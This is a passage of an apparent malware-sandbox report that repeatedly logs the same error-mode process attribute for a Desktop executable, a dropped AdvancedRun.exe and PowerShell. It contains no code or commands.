                      Source: C:\Users\user\Desktop\lKJbVguaav.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\lKJbVguaav.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\lKJbVguaav.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\lKJbVguaav.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\lKJbVguaav.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\lKJbVguaav.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\lKJbVguaav.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\lKJbVguaav.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\lKJbVguaav.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\lKJbVguaav.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\lKJbVguaav.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\lKJbVguaav.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\lKJbVguaav.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\lKJbVguaav.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\lKJbVguaav.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\lKJbVguaav.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\lKJbVguaav.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\lKJbVguaav.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\lKJbVguaav.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\lKJbVguaav.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\lKJbVguaav.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\lKJbVguaav.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\lKJbVguaav.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\lKJbVguaav.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\lKJbVguaav.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\lKJbVguaav.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\lKJbVguaav.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\74756a05-3a9e-4a94-ac38-fe701c90e011\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\74756a05-3a9e-4a94-ac38-fe701c90e011\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\74756a05-3a9e-4a94-ac38-fe701c90e011\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\74756a05-3a9e-4a94-ac38-fe701c90e011\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\74756a05-3a9e-4a94-ac38-fe701c90e011\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\74756a05-3a9e-4a94-ac38-fe701c90e011\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\74756a05-3a9e-4a94-ac38-fe701c90e011\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\74756a05-3a9e-4a94-ac38-fe701c90e011\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\74756a05-3a9e-4a94-ac38-fe701c90e011\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
